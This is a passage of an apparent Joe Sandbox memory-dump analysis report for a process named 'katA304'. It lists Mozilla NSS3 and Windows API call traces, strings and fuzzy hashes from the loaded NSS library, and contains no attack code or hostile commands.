                                                            • free.MOZGLUE(?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95DFA
                                                            • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95E33
                                                            • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CA95E3E
                                                            • free.MOZGLUE(?,?,?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CA95E47
                                                            • free.MOZGLUE(?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95E60
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CA95E78
                                                            • free.MOZGLUE(?,?,?,?,?,?,?,6CA9AAD4), ref: 6CA95EB9
                                                            • free.MOZGLUE(?,?,?,?,?,?,?,6CA9AAD4), ref: 6CA95EF0
                                                            • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CA95F3D
                                                            • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CA95F4B
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                            • String ID:
                                                            • API String ID: 4273776295-0
                                                            • Opcode ID: 236e70b064d0648655fb0d33adc39a9c766afe50d677d1ac32e331bed0e0a064
                                                            • Instruction ID: d4b243ff8259bbecec76b07162897325ca10c010752e1aa0e377493f3e7dff71
                                                            • Opcode Fuzzy Hash: 236e70b064d0648655fb0d33adc39a9c766afe50d677d1ac32e331bed0e0a064
                                                            • Instruction Fuzzy Hash: 1B71C4B4A00B019FD700CF24D986A9277F6FF49309F148629E85E87B11E732F999CB91
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,?), ref: 6CA18E22
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA18E36
                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CA18E4F
                                                            • calloc.MOZGLUE(00000001,?,?,?), ref: 6CA18E78
                                                            • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CA18E9B
                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA18EAC
                                                            • PL_ArenaAllocate.NSS3(?,?), ref: 6CA18EDE
                                                            • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CA18EF0
                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CA18F00
                                                            • free.MOZGLUE(?), ref: 6CA18F0E
                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CA18F39
                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CA18F4A
                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CA18F5B
                                                            • PR_Unlock.NSS3(?), ref: 6CA18F72
                                                            • PR_Unlock.NSS3(?), ref: 6CA18F82
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                            • String ID:
                                                            • API String ID: 1569127702-0
                                                            • Opcode ID: 101163c8adc260628e2f3e62bdcc928d3dc74d92abe790081d3a1f159720cf30
                                                            • Instruction ID: e4955762cd7e966c3e9518641d09ea250c423d381b72a5d57f89f0c19c3a1ed0
                                                            • Opcode Fuzzy Hash: 101163c8adc260628e2f3e62bdcc928d3dc74d92abe790081d3a1f159720cf30
                                                            • Instruction Fuzzy Hash: 355104B2E042159FEB009F68CC8496EB7B9EF55358B1A412AEC189BF40E731ED85C7D1
                                                            APIs
                                                            • PK11_DoesMechanism.NSS3(?,00000132), ref: 6CA3CE9E
                                                            • PK11_DoesMechanism.NSS3(?,00000321), ref: 6CA3CEBB
                                                            • PK11_DoesMechanism.NSS3(?,00001081), ref: 6CA3CED8
                                                            • PK11_DoesMechanism.NSS3(?,00000551), ref: 6CA3CEF5
                                                            • PK11_DoesMechanism.NSS3(?,00000651), ref: 6CA3CF12
                                                            • PK11_DoesMechanism.NSS3(?,00000321), ref: 6CA3CF2F
                                                            • PK11_DoesMechanism.NSS3(?,00000121), ref: 6CA3CF4C
                                                            • PK11_DoesMechanism.NSS3(?,00000400), ref: 6CA3CF69
                                                            • PK11_DoesMechanism.NSS3(?,00000341), ref: 6CA3CF86
                                                            • PK11_DoesMechanism.NSS3(?,00000311), ref: 6CA3CFA3
                                                            • PK11_DoesMechanism.NSS3(?,00000301), ref: 6CA3CFBC
                                                            • PK11_DoesMechanism.NSS3(?,00000331), ref: 6CA3CFD5
                                                            • PK11_DoesMechanism.NSS3(?,00000101), ref: 6CA3CFEE
                                                            • PK11_DoesMechanism.NSS3(?,00000141), ref: 6CA3D007
                                                            • PK11_DoesMechanism.NSS3(?,00001008), ref: 6CA3D021
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: DoesK11_Mechanism
                                                            • String ID:
                                                            • API String ID: 622698949-0
                                                            • Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                            • Instruction ID: f7a7b1cc82e79ec6305ca6df52de5dcdba8d7b11588d40d7ea82f913d1eab17f
                                                            • Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                            • Instruction Fuzzy Hash: 8E31A771B2292023EF0E04565E31BDE145A4B6670EF881138FD4FE57C0F69997BB42E5
                                                            APIs
                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6C98DD56
                                                            • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C98DD7C
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C98DE67
                                                            • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C98DEC4
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C98DECD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: memcpy$_byteswap_ulong
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 2339628231-598938438
                                                            • Opcode ID: 0f9f0982bef2d4a0fd5e3f2e22209f25079d928086eae900b2e5f987528d1cf7
                                                            • Instruction ID: 38ee3818204dc41cbd2df82c3674efe5b356ab66bac5d3a5c201e2d69f753168
                                                            • Opcode Fuzzy Hash: 0f9f0982bef2d4a0fd5e3f2e22209f25079d928086eae900b2e5f987528d1cf7
                                                            • Instruction Fuzzy Hash: 4AA1E6726092529FD710CF29C480A6AB7F9EF95318F158D2EF8898BF41E730E855CB91
                                                            APIs
                                                            • PORT_Alloc_Util.NSS3(?), ref: 6CA4EE0B
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA4EEE1
                                                              • Part of subcall function 6CA41D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CA41D7E
                                                              • Part of subcall function 6CA41D50: EnterCriticalSection.KERNEL32(?), ref: 6CA41D8E
                                                              • Part of subcall function 6CA41D50: PR_Unlock.NSS3(?), ref: 6CA41DD3
                                                            • TlsGetValue.KERNEL32 ref: 6CA4EE51
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA4EE65
                                                            • PR_Unlock.NSS3(?), ref: 6CA4EEA2
                                                            • free.MOZGLUE(?), ref: 6CA4EEBB
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA4EED0
                                                            • PR_Unlock.NSS3(?), ref: 6CA4EF48
                                                            • free.MOZGLUE(?), ref: 6CA4EF68
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA4EF7D
                                                            • PK11_DoesMechanism.NSS3(?,?), ref: 6CA4EFA4
                                                            • free.MOZGLUE(?), ref: 6CA4EFDA
                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CA4F055
                                                            • free.MOZGLUE(?), ref: 6CA4F060
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                            • String ID:
                                                            • API String ID: 2524771861-0
                                                            • Opcode ID: ff746047a9fbb54e7b4752e15d1b7db20124cf9b6e3816cd948876ef2a8f7c4c
                                                            • Instruction ID: d904009023e7794f2308067b7eccd2bfea892fe2f27fb69baabba2eea7f70e19
                                                            • Opcode Fuzzy Hash: ff746047a9fbb54e7b4752e15d1b7db20124cf9b6e3816cd948876ef2a8f7c4c
                                                            • Instruction Fuzzy Hash: 1E816275A00205AFDF00DFA5DD45EEEBBB5BF48318F584024E909A3711E731E9A8CBA1
                                                            APIs
                                                            • PK11_SignatureLen.NSS3(?), ref: 6CA14D80
                                                            • PORT_Alloc_Util.NSS3(00000000), ref: 6CA14D95
                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CA14DF2
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA14E2C
                                                            • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CA14E43
                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CA14E58
                                                            • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CA14E85
                                                            • DER_Encode_Util.NSS3(?,?,6CB605A4,00000000), ref: 6CA14EA7
                                                            • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CA14F17
                                                            • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CA14F45
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA14F62
                                                            • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CA14F7A
                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA14F89
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA14FC8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                            • String ID:
                                                            • API String ID: 2843999940-0
                                                            • Opcode ID: 0d3993ebac228e15b2eb0d7ea6ff1f6cb78c8ae896be1d1b8fd1d12795de061d
                                                            • Instruction ID: eb522b3b856c57b34c19f600512acd79782e07c5629cad9d7db460b489eba74c
                                                            • Opcode Fuzzy Hash: 0d3993ebac228e15b2eb0d7ea6ff1f6cb78c8ae896be1d1b8fd1d12795de061d
                                                            • Instruction Fuzzy Hash: EE81A275908301AFE701CF29D940B9BB7E4AB8475CF18852DF958DBB40E731E988CB92
                                                            APIs
                                                            • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CA55C9B
                                                            • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CA55CF4
                                                            • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CA55CFD
                                                            • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CA55D42
                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CA55D4E
                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA55D78
                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CA55E18
                                                            • TlsGetValue.KERNEL32 ref: 6CA55E5E
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA55E72
                                                            • PR_Unlock.NSS3(?), ref: 6CA55E8B
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CA4F854
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CA4F868
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CA4F882
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(04C483FF,?,?), ref: 6CA4F889
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CA4F8A4
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CA4F8AB
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CA4F8C9
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(280F10EC,?,?), ref: 6CA4F8D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                            • String ID: d$tokens=[0x%x=<%s>]
                                                            • API String ID: 2028831712-1373489631
                                                            • Opcode ID: 4f439433dd21a552e8c1d859c996ea20424962860b4d6e0ba0f39f36ee3e7a5f
                                                            • Instruction ID: 72913f31f3b97745b58b0a15c335a4b56789817c7b09e7ee24a8cd762e69e947
                                                            • Opcode Fuzzy Hash: 4f439433dd21a552e8c1d859c996ea20424962860b4d6e0ba0f39f36ee3e7a5f
                                                            • Instruction Fuzzy Hash: 307103F1F041019BEB019F25DD4576A3275AF4535CF988035EC0A9BB42EB32E9B9CB92
                                                            APIs
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CA4781D,00000000,6CA3BE2C,?,6CA46B1D,?,?,?,?,00000000,00000000,6CA4781D), ref: 6CA46C40
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CA4781D,?,6CA3BE2C,?), ref: 6CA46C58
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CA4781D), ref: 6CA46C6F
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CA46C84
                                                            • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CA46C96
                                                              • Part of subcall function 6C9F1240: TlsGetValue.KERNEL32(00000040,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1267
                                                              • Part of subcall function 6C9F1240: EnterCriticalSection.KERNEL32(?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F127C
                                                              • Part of subcall function 6C9F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1291
                                                              • Part of subcall function 6C9F1240: PR_Unlock.NSS3(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F12A0
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CA46CAA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                            • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                            • API String ID: 4221828374-3736768024
                                                            • Opcode ID: c4b91682059600ea34b43d622c120a399913b4b5b54c72119140420c59a5fdb6
                                                            • Instruction ID: f6b9b563cad84624856b1d5b8f88de83d35f967d02e9697f22a39d173f4bc139
                                                            • Opcode Fuzzy Hash: c4b91682059600ea34b43d622c120a399913b4b5b54c72119140420c59a5fdb6
                                                            • Instruction Fuzzy Hash: E701F2E170639123FA002BBA2C4AF26361E9F5156EF184432FF08F1A85EBD2E514C0A5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                            • String ID:
                                                            • API String ID: 786543732-0
                                                            • Opcode ID: d2eb94e8269967de64a027d6b20a31ec12d745c0951510f4bd2130af5deb9f16
                                                            • Instruction ID: 0331ad7ea4f4515cb581edd64732dfd019a265bc5cb81d4b566a9d5e6af2d932
                                                            • Opcode Fuzzy Hash: d2eb94e8269967de64a027d6b20a31ec12d745c0951510f4bd2130af5deb9f16
                                                            • Instruction Fuzzy Hash: 3E51C478E012168BDF00DF59DC456AE7778BF1A348F180025DC25A7B50DB31E956CBE2
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CA3ADE6
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA3AE17
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA3AE29
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA3AE3F
                                                            • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CA3AE78
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA3AE8A
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA3AEA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: L_strncpyzPrint$L_strcatn
                                                            • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                            • API String ID: 332880674-605059067
                                                            • Opcode ID: 99d29f63aa23fc516463ba760ce17896a8187eb231b747b5ad6c7fc4f8e3c248
                                                            • Instruction ID: 2ce412b7bd5a44a5a564408afc216b0389dca797c3dcba3ee4d381c2781aaed8
                                                            • Opcode Fuzzy Hash: 99d29f63aa23fc516463ba760ce17896a8187eb231b747b5ad6c7fc4f8e3c248
                                                            • Instruction Fuzzy Hash: F9312735604174ABDF01CF65EC58FBE377AAB46358F484428E40DDBA81DB389C48CB92
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6CA39F06
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA39F37
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA39F49
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA39F5F
                                                            • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CA39F98
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA39FAA
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA39FC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: L_strncpyzPrint$L_strcatn
                                                            • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit
                                                            • API String ID: 332880674-1139731676
                                                            • Opcode ID: aa3231266b27d978557cf06fc2c8adddc56216e15b792d58b144b0a37f243753
                                                            • Instruction ID: 5f97e0250a3433df61d9854e94d51984731b65426091af154a1dd42872a420aa
                                                            • Opcode Fuzzy Hash: aa3231266b27d978557cf06fc2c8adddc56216e15b792d58b144b0a37f243753
                                                            • Instruction Fuzzy Hash: 79311A35605264ABDB01DF25ED58FBE3779AB4635CF084028F50DDBA81DF389988CB92
                                                            APIs
                                                            • sqlite3_value_text16.NSS3(?), ref: 6CAD4CAF
                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CAD4CFD
                                                            • sqlite3_value_text16.NSS3(?), ref: 6CAD4D44
                                                            Strings
